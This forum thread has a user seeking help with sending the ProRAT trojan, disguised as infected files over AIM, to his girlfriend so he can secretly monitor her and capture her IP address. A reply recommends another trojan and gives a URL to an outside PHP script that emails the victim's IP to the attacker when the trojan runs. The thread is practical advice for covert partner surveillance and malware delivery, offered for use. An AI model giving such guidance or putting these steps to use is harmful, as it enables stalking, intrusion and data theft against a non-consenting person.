munin
+ Reply to Thread

Thread: catCHING the CHEATER!

catCHING the CHEATER!

hey you guys, i need help with my prorat program. Im trying to send infected files thru aim to my gf. so i can monitor what she is doing. the problem is that sometimes she cant open it and other times when she does, her ip address isnt sent to my notification---email. is there a better kind of notification i can use? what's the problem?

carlo Guest

-

If i was you, i would (if there is an option while making the sever) select the open website or something and use syntax******'s php script.

i dont get it, im only familiar w/ sending infected pictures to get the ip...u want me to set up an infected url for her to open? or use another notification?

carlo Guest

-

Tell you what. Get the latest C.I.A trojan (Google it) then select the option where its says notification the click the open website selection. Type in syntax******'s link which is [PHP]http://www.boninroad.com/funny2.php?friend=YOUREMAILADDRESS[/PHP]
    Of course replace the "youremailaddress" with your email. Once she opend the sever it will open syntax******'s ip emailer and it will send it to your email.

+ Reply to Thread